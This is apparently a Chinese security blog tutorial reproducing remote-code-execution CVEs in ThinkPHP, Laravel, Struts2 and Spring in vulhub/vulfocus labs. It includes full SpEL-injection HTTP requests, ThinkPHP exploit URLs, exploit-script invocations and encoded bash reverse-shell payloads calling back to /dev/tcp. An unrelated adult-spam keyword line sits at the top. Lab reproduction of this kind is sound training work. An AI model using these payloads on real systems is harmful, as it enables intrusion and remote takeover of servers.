国产 无码 综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

框架安全-CVE 復(fù)現(xiàn)&Spring&Struts&Laravel&ThinkPHP漏洞復(fù)現(xiàn)

這篇具有很好參考價(jià)值的文章主要介紹了框架安全-CVE 復(fù)現(xiàn)&Spring&Struts&Laravel&ThinkPHP漏洞復(fù)現(xiàn)。希望對(duì)大家有所幫助。如果存在錯(cuò)誤或未考慮完全的地方,請(qǐng)大家不吝賜教,您也可以點(diǎn)擊"舉報(bào)違法"按鈕提交疑問。

服務(wù)攻防-框架安全&CVE 復(fù)現(xiàn)&Spring&Struts&Laravel&ThinkPHP

概述

中間件及框架列表:

IIS,Apache,Nginx,Tomcat,Docker,K8s,Weblogic,JBoos,WebSphere,Jenkins ,GlassFish,Jetty,Jira,Struts2,Laravel,Solr,Shiro,Thinkphp,Spring,F(xiàn)lask,jQuery 等

1、開發(fā)框架-PHP-Laravel-Thinkphp

2、開發(fā)框架-Javaweb-St2-Spring

3、開發(fā)框架-Python-django-Flask

4、開發(fā)框架-Javascript-Node.js-JQuery

常見語言開發(fā)框架:

PHP:Thinkphp Laravel YII CodeIgniter CakePHP Zend 等

JAVA:Spring MyBatis Hibernate Struts2 Springboot 等

Python:Django Flask Bottle Turbobars Tornado Web2py 等

Javascript:Vue.js Node.js Bootstrap JQuery Angular 等

PHP-開發(fā)框架安全-Thinkphp&Laravel

詳解:Thinkphp詳解

詳解:Laravel詳解

ThinkPHP是一個(gè)快速、兼容而且簡單的輕量級(jí)國產(chǎn)PHP開發(fā)框架,誕生于2006年初,原名FCS,2007年元旦正式更名為ThinkPHP,遵循Apache2開源協(xié)議發(fā)布,從Struts結(jié)構(gòu)移植過來并做了改進(jìn)和完善,同時(shí)也借鑒了國外很多優(yōu)秀的框架和模式,使用面向?qū)ο蟮拈_發(fā)結(jié)構(gòu)和MVC模式,融合了Struts的思想和TagLib(標(biāo)簽庫)、RoR的ORM映射和ActiveRecord模式。

Laravel是一套簡潔、優(yōu)雅的PHP Web開發(fā)框架(PHP Web Framework)。它可以從面條一樣雜亂的代碼中解脫出來;它可以構(gòu)建網(wǎng)絡(luò)APP,而且每行代碼都可以簡潔、富于表達(dá)力。

安全問題:

Thinkphp-3.X RCE

Thinkphp-5.X RCE

CVE-2021-3129 RCE

特征:

利用前可先判斷其開發(fā)框架,通過瀏覽器插件,或者數(shù)據(jù)包信息內(nèi)容等進(jìn)行判斷是什么開發(fā)框架。判斷方式很多。

"十年磨一劍"是ThinkPHP的特征之一,出現(xiàn)圖標(biāo),倒立微笑的笑臉也是特征之一。

漏洞復(fù)現(xiàn)

Thinkphp-3.X RCE

靶場(chǎng):vulfocus

開啟環(huán)境:

框架安全-CVE 復(fù)現(xiàn)&Spring&Struts&Laravel&ThinkPHP漏洞復(fù)現(xiàn),漏洞復(fù)現(xiàn),Web安全,spring,struts,網(wǎng)絡(luò)安全,web安全,laravel

漏洞利用:

可直接放入到工具當(dāng)中進(jìn)行檢測(cè),一鍵利用即可

框架安全-CVE 復(fù)現(xiàn)&Spring&Struts&Laravel&ThinkPHP漏洞復(fù)現(xiàn),漏洞復(fù)現(xiàn),Web安全,spring,struts,網(wǎng)絡(luò)安全,web安全,laravel

命令執(zhí)行RCE:

框架安全-CVE 復(fù)現(xiàn)&Spring&Struts&Laravel&ThinkPHP漏洞復(fù)現(xiàn),漏洞復(fù)現(xiàn),Web安全,spring,struts,網(wǎng)絡(luò)安全,web安全,laravel

payload:
http://192.168.100.134:24566//?m=Home&c=Index&a=index&value[_filename]=./Application/Runtime/Logs/Home/23_10_26.log

查看:

框架安全-CVE 復(fù)現(xiàn)&Spring&Struts&Laravel&ThinkPHP漏洞復(fù)現(xiàn),漏洞復(fù)現(xiàn),Web安全,spring,struts,網(wǎng)絡(luò)安全,web安全,laravel

還可以進(jìn)行g(shù)etshell,找到路徑,一鍵getshell:

框架安全-CVE 復(fù)現(xiàn)&Spring&Struts&Laravel&ThinkPHP漏洞復(fù)現(xiàn),漏洞復(fù)現(xiàn),Web安全,spring,struts,網(wǎng)絡(luò)安全,web安全,laravel

直接可getshell:

框架安全-CVE 復(fù)現(xiàn)&Spring&Struts&Laravel&ThinkPHP漏洞復(fù)現(xiàn),漏洞復(fù)現(xiàn),Web安全,spring,struts,網(wǎng)絡(luò)安全,web安全,laravel

然后使用蟻劍連接即可:

成功連接:

框架安全-CVE 復(fù)現(xiàn)&Spring&Struts&Laravel&ThinkPHP漏洞復(fù)現(xiàn),漏洞復(fù)現(xiàn),Web安全,spring,struts,網(wǎng)絡(luò)安全,web安全,laravel

日志泄露:

Payload: 
http://192.168.100.134:24566//Application/Runtime/Logs/Admin/23_10_26.log

查看:

框架安全-CVE 復(fù)現(xiàn)&Spring&Struts&Laravel&ThinkPHP漏洞復(fù)現(xiàn),漏洞復(fù)現(xiàn),Web安全,spring,struts,網(wǎng)絡(luò)安全,web安全,laravel

工具在github搜索即可,有很多,遇到不好用的也正常。(利用簡單[工具點(diǎn)一點(diǎn)就可以~],發(fā)現(xiàn)該系列漏洞,危害較大。)以下也是同理。

Thinkphp-5.X RCE

ThinkPHP是在中國使用非常廣泛的PHP開發(fā)框架。在其版本 5 中,由于框架錯(cuò)誤地處理控制器名稱,如果網(wǎng)站未啟用強(qiáng)制路由(這是默認(rèn)),它可以執(zhí)行任何方法,從而導(dǎo)致 RCE 漏洞。

靶場(chǎng):vulhub

參考:Thinkphp5 5.0.22/5.1.29 遠(yuǎn)程執(zhí)行代碼漏洞

框架安全-CVE 復(fù)現(xiàn)&Spring&Struts&Laravel&ThinkPHP漏洞復(fù)現(xiàn),漏洞復(fù)現(xiàn),Web安全,spring,struts,網(wǎng)絡(luò)安全,web安全,laravel

開啟環(huán)境:

框架安全-CVE 復(fù)現(xiàn)&Spring&Struts&Laravel&ThinkPHP漏洞復(fù)現(xiàn),漏洞復(fù)現(xiàn),Web安全,spring,struts,網(wǎng)絡(luò)安全,web安全,laravel

訪問靶場(chǎng):

框架安全-CVE 復(fù)現(xiàn)&Spring&Struts&Laravel&ThinkPHP漏洞復(fù)現(xiàn),漏洞復(fù)現(xiàn),Web安全,spring,struts,網(wǎng)絡(luò)安全,web安全,laravel

漏洞利用:

利用方式和以上一致,直接利用成熟的工具即可。

利用前可先判斷其開發(fā)框架,通過瀏覽器插件,或者數(shù)據(jù)包信息內(nèi)容等進(jìn)行判斷是什么開發(fā)框架。

"十年磨一劍"是ThinkPHP的特征之一,微笑的笑臉也是特征。

直接將url信息內(nèi)容,拋到工具當(dāng)中:

框架安全-CVE 復(fù)現(xiàn)&Spring&Struts&Laravel&ThinkPHP漏洞復(fù)現(xiàn),漏洞復(fù)現(xiàn),Web安全,spring,struts,網(wǎng)絡(luò)安全,web安全,laravel

輸入利用的漏洞編號(hào),利用即可:

命令執(zhí)行RCE:

框架安全-CVE 復(fù)現(xiàn)&Spring&Struts&Laravel&ThinkPHP漏洞復(fù)現(xiàn),漏洞復(fù)現(xiàn),Web安全,spring,struts,網(wǎng)絡(luò)安全,web安全,laravel

getshell:

框架安全-CVE 復(fù)現(xiàn)&Spring&Struts&Laravel&ThinkPHP漏洞復(fù)現(xiàn),漏洞復(fù)現(xiàn),Web安全,spring,struts,網(wǎng)絡(luò)安全,web安全,laravel

通過蟻劍進(jìn)行連接:

連接添加成功:

框架安全-CVE 復(fù)現(xiàn)&Spring&Struts&Laravel&ThinkPHP漏洞復(fù)現(xiàn),漏洞復(fù)現(xiàn),Web安全,spring,struts,網(wǎng)絡(luò)安全,web安全,laravel

Laravel框架安全問題- CVE-2021-3129 RCE

詳解:Laravel詳解

Laravel是一套簡潔、優(yōu)雅的PHP Web開發(fā)框架(PHP Web Framework)。它可以從面條一樣雜亂的代碼中解脫出來;它可以構(gòu)建網(wǎng)絡(luò)APP,而且每行代碼都可以簡潔、富于表達(dá)力。

靶場(chǎng):vulfocus

漏洞描述:

Laravel是一套簡潔、開源的PHP Web開發(fā)框架,旨在實(shí)現(xiàn)Web軟件的MVC架構(gòu)。 Laravel開啟了Debug模式時(shí),由于Laravel自帶的Ignition 組件對(duì)file_get_contents()和file_put_contents()函數(shù)的不安全使用,攻擊者可以通過發(fā)起惡意請(qǐng)求,構(gòu)造惡意Log文件等方式觸發(fā)Phar反序列化,最終造成遠(yuǎn)程代碼執(zhí)行

開啟靶場(chǎng):

框架安全-CVE 復(fù)現(xiàn)&Spring&Struts&Laravel&ThinkPHP漏洞復(fù)現(xiàn),漏洞復(fù)現(xiàn),Web安全,spring,struts,網(wǎng)絡(luò)安全,web安全,laravel

訪問:

框架安全-CVE 復(fù)現(xiàn)&Spring&Struts&Laravel&ThinkPHP漏洞復(fù)現(xiàn),漏洞復(fù)現(xiàn),Web安全,spring,struts,網(wǎng)絡(luò)安全,web安全,laravel

漏洞利用:

github搜索漏洞編號(hào)CVE-2021-3129,查找相關(guān)exp下載利用即可

exp地址:CVE-2021-3129EXP

python laravel-CVE-2021-3129-EXP.py http://192.168.100.134:29972

直接利用即可,getshell:

框架安全-CVE 復(fù)現(xiàn)&Spring&Struts&Laravel&ThinkPHP漏洞復(fù)現(xiàn),漏洞復(fù)現(xiàn),Web安全,spring,struts,網(wǎng)絡(luò)安全,web安全,laravel

哥斯拉鏈接即可。

利用相對(duì)簡單,使用現(xiàn)成熟的腳步或工具即可。github上搜索即可。

JAVAWEB-開發(fā)框架安全-Spring&Struts2

Struts2框架安全

Struts2介紹:

詳解:Struts2框架

Struts2框架是一個(gè)用于開發(fā)Java EE網(wǎng)絡(luò)應(yīng)用程序的開放源代碼網(wǎng)頁應(yīng)用程序架構(gòu)。它利用并延伸了Java Servlet API,鼓勵(lì)開發(fā)者采用MVC架構(gòu)。Struts2以WebWork優(yōu)秀的設(shè)計(jì)思想為核心,吸收了Struts框架的部分優(yōu)點(diǎn),提供了一個(gè)更加整潔的MVC設(shè)計(jì)模式實(shí)現(xiàn)的Web應(yīng)用程序框架。

框架特點(diǎn):

1、一般st2框架開發(fā)的網(wǎng)站,url上會(huì)有.action或.do后綴的文件名,比如:

http://192.168.xx.xx/integration/editGangster.action

http://192.168.xxx.xxx:8080/login.action

方法1可能不準(zhǔn)確,因?yàn)閟pring框架或jboss系統(tǒng)有時(shí)候也存在.do結(jié)尾的文件名。

2、在相關(guān)接口追加actionErrors參數(shù),通過網(wǎng)站頁面的回顯錯(cuò)誤消息來判斷。

3、默認(rèn)情況下,st2框架中存在http://192.168.xXx/struts/webconsole.html這個(gè)默認(rèn)文件。

4、抓包,看包中Content–Type字段的開頭是否形如%{#x=[‘XXX’]

方法4僅限于st2-045框架漏洞

此Struts2系列漏洞現(xiàn)有成熟工具,判別出特征,直接利用即可。

較新的漏洞可能工具不支持。

漏洞復(fù)現(xiàn)

以struts2系列之一為例:

S2-009 遠(yuǎn)程執(zhí)行代碼漏洞

靶場(chǎng):vulhub

參考:s2-009

開啟環(huán)境:

框架安全-CVE 復(fù)現(xiàn)&Spring&Struts&Laravel&ThinkPHP漏洞復(fù)現(xiàn),漏洞復(fù)現(xiàn),Web安全,spring,struts,網(wǎng)絡(luò)安全,web安全,laravel

訪問:

發(fā)現(xiàn)明顯的struts2特征

框架安全-CVE 復(fù)現(xiàn)&Spring&Struts&Laravel&ThinkPHP漏洞復(fù)現(xiàn),漏洞復(fù)現(xiàn),Web安全,spring,struts,網(wǎng)絡(luò)安全,web安全,laravel

直接放到工具當(dāng)中進(jìn)行檢測(cè):

框架安全-CVE 復(fù)現(xiàn)&Spring&Struts&Laravel&ThinkPHP漏洞復(fù)現(xiàn),漏洞復(fù)現(xiàn),Web安全,spring,struts,網(wǎng)絡(luò)安全,web安全,laravel

框架安全-CVE 復(fù)現(xiàn)&Spring&Struts&Laravel&ThinkPHP漏洞復(fù)現(xiàn),漏洞復(fù)現(xiàn),Web安全,spring,struts,網(wǎng)絡(luò)安全,web安全,laravel

一鍵利用,命令執(zhí)行:

框架安全-CVE 復(fù)現(xiàn)&Spring&Struts&Laravel&ThinkPHP漏洞復(fù)現(xiàn),漏洞復(fù)現(xiàn),Web安全,spring,struts,網(wǎng)絡(luò)安全,web安全,laravel

工具可在github上搜索,有很多。不排除有不好用的。

CVE-2017-5638(struts2-045 遠(yuǎn)程代碼執(zhí)行)

漏洞復(fù)現(xiàn):struts2-045 遠(yuǎn)程代碼執(zhí)行漏洞CVE-2017-5638

CVE-2020-17530 代碼執(zhí)行

struts2 代碼執(zhí)行 (CVE-2020-17530)

描述:

Struts2是一個(gè)基于MVC設(shè)計(jì)模式的Web應(yīng)用框架,它本質(zhì)上相當(dāng)于一個(gè)servlet,在MVC設(shè)計(jì)模式中,Struts2作為控制器(Controller)來建立模型與視圖的數(shù)據(jù)交互。 在特定的環(huán)境下,遠(yuǎn)程攻擊者通過構(gòu)造 惡意的OGNL表達(dá)式 ,可造成任意代碼執(zhí)行

靶場(chǎng):vulfocus

開啟環(huán)境:

框架安全-CVE 復(fù)現(xiàn)&Spring&Struts&Laravel&ThinkPHP漏洞復(fù)現(xiàn),漏洞復(fù)現(xiàn),Web安全,spring,struts,網(wǎng)絡(luò)安全,web安全,laravel

訪問:

框架安全-CVE 復(fù)現(xiàn)&Spring&Struts&Laravel&ThinkPHP漏洞復(fù)現(xiàn),漏洞復(fù)現(xiàn),Web安全,spring,struts,網(wǎng)絡(luò)安全,web安全,laravel

可使用工具檢測(cè):

框架安全-CVE 復(fù)現(xiàn)&Spring&Struts&Laravel&ThinkPHP漏洞復(fù)現(xiàn),漏洞復(fù)現(xiàn),Web安全,spring,struts,網(wǎng)絡(luò)安全,web安全,laravel

使用EXP腳本也可以,漏洞比較新,可能一些工具不支持,無法檢測(cè),利用。

github上搜索漏洞編號(hào),使用即可。

工具地址:CVE-2020-17530EXP

工具使用:

python struts2-061-poc.py http://192.168.100.134:34952 "執(zhí)行的命令"

框架安全-CVE 復(fù)現(xiàn)&Spring&Struts&Laravel&ThinkPHP漏洞復(fù)現(xiàn),漏洞復(fù)現(xiàn),Web安全,spring,struts,網(wǎng)絡(luò)安全,web安全,laravel

反彈shell:

python2 S2-061-shell.py http://192.168.100.134:34952

反彈成功

框架安全-CVE 復(fù)現(xiàn)&Spring&Struts&Laravel&ThinkPHP漏洞復(fù)現(xiàn),漏洞復(fù)現(xiàn),Web安全,spring,struts,網(wǎng)絡(luò)安全,web安全,laravel

CVE-2021-31805 遠(yuǎn)程代碼執(zhí)行

遠(yuǎn)程代碼執(zhí)行漏洞-CVE-2021-31805

影響范圍:Apache Struts 2.0.0-2.5.29

靶場(chǎng):vulfocus

開啟并訪問。

漏洞利用EXP,可直接去github上搜索編號(hào),下載利用即可。

EXP地址:s2-062EXP

框架安全-CVE 復(fù)現(xiàn)&Spring&Struts&Laravel&ThinkPHP漏洞復(fù)現(xiàn),漏洞復(fù)現(xiàn),Web安全,spring,struts,網(wǎng)絡(luò)安全,web安全,laravel

修復(fù):升級(jí)即可。

JAVAWEB-開發(fā)框架安全-Spring框架

spring框架安全

Spring框架是由于軟件開放復(fù)雜性而創(chuàng)建的??蚣芟掠泻芏嘧臃种?,披露了很多安全問題。
特征:小綠葉圖標(biāo)

spring框架介紹:

詳解:spring開源框架

Spring框架是一個(gè)開放源代碼的J2EE應(yīng)用程序框架,由Rod Johnson發(fā)起,是針對(duì)bean的生命周期進(jìn)行管理的輕量級(jí)容器(lightweight container)。 Spring解決了開發(fā)者在J2EE開發(fā)中遇到的許多常見的問題,提供了功能強(qiáng)大IOC、AOP及Web MVC等功能。Spring可以單獨(dú)應(yīng)用于構(gòu)筑應(yīng)用程序,也可以和Struts、Webwork、Tapestry等眾多Web框架組合使用,并且可以與 Swing等桌面應(yīng)用程序AP組合。因此, Spring不僅僅能應(yīng)用于J2EE應(yīng)用程序之中,也可以應(yīng)用于桌面應(yīng)用程序以及小應(yīng)用程序之中。Spring框架主要由七部分組成,分別是 Spring Core、 Spring AOP、 Spring ORM、 Spring DAO、Spring Context、 Spring Web和 Spring Web MVC。

安全問題:

CVE-2017-4971

CVE-2018-1273

CVE-2022-22947

CVE-2022-22963

漏洞復(fù)現(xiàn)
Spring Data Commons 遠(yuǎn)程命令執(zhí)行漏洞(CVE-2018-1273)

介紹:

Spring Data 項(xiàng)目的目的是為了簡化構(gòu)建基于 Spring 框架應(yīng)用的數(shù)據(jù)訪問計(jì)數(shù),包括非關(guān)系數(shù)據(jù)庫、Map-Reduce 框架、云數(shù)據(jù)服務(wù)等等;另外也包含對(duì)關(guān)系數(shù)據(jù)庫的訪問支持。

Spring Data是一個(gè)用于簡化數(shù)據(jù)庫訪問,并支持云服務(wù)的開源框架,Spring Data Commons是Spring Data下所有子項(xiàng)目共享的基礎(chǔ)框架。Spring Data Commons 在2.0.5及以前版本中,存在一處SpEL表達(dá)式注入漏洞,攻擊者可以注入惡意SpEL表達(dá)式以執(zhí)行任意命令。

靶場(chǎng):vulhub

開啟環(huán)境:

框架安全-CVE 復(fù)現(xiàn)&Spring&Struts&Laravel&ThinkPHP漏洞復(fù)現(xiàn),漏洞復(fù)現(xiàn),Web安全,spring,struts,網(wǎng)絡(luò)安全,web安全,laravel

訪問:

特征:小綠葉圖標(biāo)

框架安全-CVE 復(fù)現(xiàn)&Spring&Struts&Laravel&ThinkPHP漏洞復(fù)現(xiàn),漏洞復(fù)現(xiàn),Web安全,spring,struts,網(wǎng)絡(luò)安全,web安全,laravel

注冊(cè)用戶信息:

框架安全-CVE 復(fù)現(xiàn)&Spring&Struts&Laravel&ThinkPHP漏洞復(fù)現(xiàn),漏洞復(fù)現(xiàn),Web安全,spring,struts,網(wǎng)絡(luò)安全,web安全,laravel

當(dāng)注冊(cè)用戶時(shí),burp抓包:

框架安全-CVE 復(fù)現(xiàn)&Spring&Struts&Laravel&ThinkPHP漏洞復(fù)現(xiàn),漏洞復(fù)現(xiàn),Web安全,spring,struts,網(wǎng)絡(luò)安全,web安全,laravel

修改數(shù)據(jù)包信息

payload:
......
username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("touch /tmp/success")]=&password=&repeatedPassword=

數(shù)據(jù)包內(nèi)容:

POST /users?page=&size=5 HTTP/1.1
Host: 192.168.100.134:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36 uacq
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 120
Origin: http://192.168.100.134:8080
Connection: close
Referer: http://192.168.100.134:8080/users?page=0&size=5
Upgrade-Insecure-Requests: 1
sec-ch-ua-platform: "macOS"
sec-ch-ua: "Google Chrome";v="112", "Chromium";v="112", "Not=A?Brand";v="24"
sec-ch-ua-mobile: ?0

username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("touch /123.txt")]=&password=&repeatedPassword=

框架安全-CVE 復(fù)現(xiàn)&Spring&Struts&Laravel&ThinkPHP漏洞復(fù)現(xiàn),漏洞復(fù)現(xiàn),Web安全,spring,struts,網(wǎng)絡(luò)安全,web安全,laravel

框架安全-CVE 復(fù)現(xiàn)&Spring&Struts&Laravel&ThinkPHP漏洞復(fù)現(xiàn),漏洞復(fù)現(xiàn),Web安全,spring,struts,網(wǎng)絡(luò)安全,web安全,laravel

進(jìn)入靶場(chǎng),驗(yàn)證是否創(chuàng)建成功:

//查看環(huán)境id
docker ps
//進(jìn)入環(huán)境
docker exec -it 環(huán)境id /bin/bash

創(chuàng)建成功:

框架安全-CVE 復(fù)現(xiàn)&Spring&Struts&Laravel&ThinkPHP漏洞復(fù)現(xiàn),漏洞復(fù)現(xiàn),Web安全,spring,struts,網(wǎng)絡(luò)安全,web安全,laravel

框架安全-CVE 復(fù)現(xiàn)&Spring&Struts&Laravel&ThinkPHP漏洞復(fù)現(xiàn),漏洞復(fù)現(xiàn),Web安全,spring,struts,網(wǎng)絡(luò)安全,web安全,laravel

反彈shell:

細(xì)節(jié)問題:需要URL編碼

先將反彈shell命令進(jìn)行base64編碼

sh -i >& /dev/tcp/192.168.100.1/8888 0>&1

base64編碼:
bash -c {echo,c2ggLWkgPiYgL2Rldi90Y3AvMTkyLjE2OC4xMDAuMS84ODg4IDA+JjE=}|{base64,-d}|{bash,-i}

框架安全-CVE 復(fù)現(xiàn)&Spring&Struts&Laravel&ThinkPHP漏洞復(fù)現(xiàn),漏洞復(fù)現(xiàn),Web安全,spring,struts,網(wǎng)絡(luò)安全,web安全,laravel

數(shù)據(jù)包當(dāng)中觀察:

content-type的值有urlencode,所以可能會(huì)進(jìn)行編碼才行。

編碼原因:請(qǐng)求頭部的信息或方式的原因,需要編碼。

框架安全-CVE 復(fù)現(xiàn)&Spring&Struts&Laravel&ThinkPHP漏洞復(fù)現(xiàn),漏洞復(fù)現(xiàn),Web安全,spring,struts,網(wǎng)絡(luò)安全,web安全,laravel

將反彈shell命令URL編碼后,再次發(fā)送:

框架安全-CVE 復(fù)現(xiàn)&Spring&Struts&Laravel&ThinkPHP漏洞復(fù)現(xiàn),漏洞復(fù)現(xiàn),Web安全,spring,struts,網(wǎng)絡(luò)安全,web安全,laravel

成功反彈shell,并執(zhí)行命令:

框架安全-CVE 復(fù)現(xiàn)&Spring&Struts&Laravel&ThinkPHP漏洞復(fù)現(xiàn),漏洞復(fù)現(xiàn),Web安全,spring,struts,網(wǎng)絡(luò)安全,web安全,laravel

Spring WebFlow 遠(yuǎn)程代碼執(zhí)行漏洞(CVE-2017-4971)

詳解:Spring Web Flow詳解

pring Web Flow (SWF) 是Spring Framework的一個(gè)脫離模塊。這個(gè)模塊是Spring Web應(yīng)用開發(fā)模塊棧的一部分,Spring Web包含Spring MVC。Spring Web Flow 的目標(biāo)是成為管理Web應(yīng)用頁面流程的最佳方案。當(dāng)你的應(yīng)用需要復(fù)雜的導(dǎo)航控制,例如向?qū)?,在一個(gè)比較大的事務(wù)過程中去指導(dǎo)用戶經(jīng)過一連串的步驟的時(shí)候,SWF將會(huì)是一個(gè)功能強(qiáng)大的控制器。

靶場(chǎng):vulhub

參考:Spring WebFlow 漏洞復(fù)現(xiàn)-CVE-2017-4971

Spring WebFlow 是一個(gè)適用于開發(fā)基于流程的應(yīng)用程序的框架(如購物邏輯),可以將流程的定義和實(shí)現(xiàn)流程行為的類和視圖分離開來。在其 2.4.x 版本中,如果我們控制了數(shù)據(jù)綁定時(shí)的field,將導(dǎo)致一個(gè)SpEL表達(dá)式注入漏洞,最終造成任意命令執(zhí)行。

框架安全-CVE 復(fù)現(xiàn)&Spring&Struts&Laravel&ThinkPHP漏洞復(fù)現(xiàn),漏洞復(fù)現(xiàn),Web安全,spring,struts,網(wǎng)絡(luò)安全,web安全,laravel

開啟環(huán)境:

框架安全-CVE 復(fù)現(xiàn)&Spring&Struts&Laravel&ThinkPHP漏洞復(fù)現(xiàn),漏洞復(fù)現(xiàn),Web安全,spring,struts,網(wǎng)絡(luò)安全,web安全,laravel

訪問web界面:

框架安全-CVE 復(fù)現(xiàn)&Spring&Struts&Laravel&ThinkPHP漏洞復(fù)現(xiàn),漏洞復(fù)現(xiàn),Web安全,spring,struts,網(wǎng)絡(luò)安全,web安全,laravel

接下來訪問http://your-ip:8080/login,用頁面左邊給出的任意一個(gè)賬號(hào)/密碼登錄系統(tǒng):

框架安全-CVE 復(fù)現(xiàn)&Spring&Struts&Laravel&ThinkPHP漏洞復(fù)現(xiàn),漏洞復(fù)現(xiàn),Web安全,spring,struts,網(wǎng)絡(luò)安全,web安全,laravel

然后訪問id為1的酒店http://your-ip:8080/hotels/1,點(diǎn)擊預(yù)訂按鈕“Book Hotel”,填寫相關(guān)信息后點(diǎn)擊“Process”(從這一步,其實(shí)WebFlow就正式開始了):

框架安全-CVE 復(fù)現(xiàn)&Spring&Struts&Laravel&ThinkPHP漏洞復(fù)現(xiàn),漏洞復(fù)現(xiàn),Web安全,spring,struts,網(wǎng)絡(luò)安全,web安全,laravel

下一步:

框架安全-CVE 復(fù)現(xiàn)&Spring&Struts&Laravel&ThinkPHP漏洞復(fù)現(xiàn),漏洞復(fù)現(xiàn),Web安全,spring,struts,網(wǎng)絡(luò)安全,web安全,laravel

下一步:

框架安全-CVE 復(fù)現(xiàn)&Spring&Struts&Laravel&ThinkPHP漏洞復(fù)現(xiàn),漏洞復(fù)現(xiàn),Web安全,spring,struts,網(wǎng)絡(luò)安全,web安全,laravel

使用burp進(jìn)行抓包:

此時(shí)抓包,抓到一個(gè)POST數(shù)據(jù)包,我們向其中添加一個(gè)字段(也就是反彈shell的POC)

獲取的數(shù)據(jù)包:

框架安全-CVE 復(fù)現(xiàn)&Spring&Struts&Laravel&ThinkPHP漏洞復(fù)現(xiàn),漏洞復(fù)現(xiàn),Web安全,spring,struts,網(wǎng)絡(luò)安全,web安全,laravel

修改后數(shù)據(jù)包添加數(shù)據(jù)內(nèi)容:

payload:

//_(new java.lang.ProcessBuilder("bash","-c","bash -i >& /dev/tcp/攻擊端ip/監(jiān)聽端口 0>&1")).start()=vulhub

......
_eventId_confirm=&_csrf=96117c67-2c77-4054-970a-d2644c9be1f2&_(new java.lang.ProcessBuilder("bash","-c","%62%61%73%68%20%2d%69%20%3e%26%20%2f%64%65%76%2f%74%63%70%2f%31%39%32%2e%31%36%38%2e%31%30%30%2e%31%2f%38%38%38%38%20%30%3e%26%31")).start()=vulhub

//注意反彈shell命令進(jìn)行url編碼,否則無法反彈

框架安全-CVE 復(fù)現(xiàn)&Spring&Struts&Laravel&ThinkPHP漏洞復(fù)現(xiàn),漏洞復(fù)現(xiàn),Web安全,spring,struts,網(wǎng)絡(luò)安全,web安全,laravel

進(jìn)行URL編碼:

框架安全-CVE 復(fù)現(xiàn)&Spring&Struts&Laravel&ThinkPHP漏洞復(fù)現(xiàn),漏洞復(fù)現(xiàn),Web安全,spring,struts,網(wǎng)絡(luò)安全,web安全,laravel

反彈成功:
框架安全-CVE 復(fù)現(xiàn)&Spring&Struts&Laravel&ThinkPHP漏洞復(fù)現(xiàn),漏洞復(fù)現(xiàn),Web安全,spring,struts,網(wǎng)絡(luò)安全,web安全,laravel

Spring Cloud Function SpEL表達(dá)式注入 (CVE-2022-22963)

詳解:spring cloud詳解

Spring Cloud Function提供了一個(gè)通用模型,用于在各種平臺(tái)上部署基于函數(shù)的軟件,包括像Amazon AWS Lambda這樣的FaaS(功能即服務(wù))平臺(tái)。

靶場(chǎng):vulhub

參考:CVE-2022-22963漏洞復(fù)現(xiàn)

框架安全-CVE 復(fù)現(xiàn)&Spring&Struts&Laravel&ThinkPHP漏洞復(fù)現(xiàn),漏洞復(fù)現(xiàn),Web安全,spring,struts,網(wǎng)絡(luò)安全,web安全,laravel

開啟環(huán)境:

框架安全-CVE 復(fù)現(xiàn)&Spring&Struts&Laravel&ThinkPHP漏洞復(fù)現(xiàn),漏洞復(fù)現(xiàn),Web安全,spring,struts,網(wǎng)絡(luò)安全,web安全,laravel

訪問web界面:

框架安全-CVE 復(fù)現(xiàn)&Spring&Struts&Laravel&ThinkPHP漏洞復(fù)現(xiàn),漏洞復(fù)現(xiàn),Web安全,spring,struts,網(wǎng)絡(luò)安全,web安全,laravel

服務(wù)器啟動(dòng)后,執(zhí)行您可以將用戶輸入轉(zhuǎn)換為大寫。

命令:
curl http://your-ip:8080/uppercase -H "Content-Type: text/plain" --data-binary test

框架安全-CVE 復(fù)現(xiàn)&Spring&Struts&Laravel&ThinkPHP漏洞復(fù)現(xiàn),漏洞復(fù)現(xiàn),Web安全,spring,struts,網(wǎng)絡(luò)安全,web安全,laravel

抓取數(shù)據(jù)包:

請(qǐng)求標(biāo)頭中有一個(gè) SpEL 表達(dá)式注入。

添加內(nèi)容:

spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("需要執(zhí)行的命令")

//完整數(shù)據(jù)包:
POST /functionRouter HTTP/1.1
Host: 192.168.100.134:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
Cookie: JSESSIONID=AEC501EC3F7F15C42686C87B98EB23AC
DNT: 1
Connection: close
spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("touch /tmp/success")
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 10

asdasdasdd

成功執(zhí)行:

驗(yàn)證:

docker-compose exec spring /bin/bash

框架安全-CVE 復(fù)現(xiàn)&Spring&Struts&Laravel&ThinkPHP漏洞復(fù)現(xiàn),漏洞復(fù)現(xiàn),Web安全,spring,struts,網(wǎng)絡(luò)安全,web安全,laravel

反彈shell:

成功反彈

框架安全-CVE 復(fù)現(xiàn)&Spring&Struts&Laravel&ThinkPHP漏洞復(fù)現(xiàn),漏洞復(fù)現(xiàn),Web安全,spring,struts,網(wǎng)絡(luò)安全,web安全,laravel

Spring Cloud Gateway Actuator API SpEL 表達(dá)式注入 (CVE-2022-22947)

介紹:

SpringCloud GateWay 詳解

Spring Cloud Gateway是Spring Cloud生態(tài)系統(tǒng)中的一部分,它是一個(gè)基于Spring Framework 5,Spring Boot 2和Project Reactor等技術(shù)開發(fā)的全新的API網(wǎng)關(guān)服務(wù)器。它旨在提供一種簡單而有效的方式來路由到API,提供過濾器,以及在執(zhí)行請(qǐng)求和響應(yīng)之間的操作。

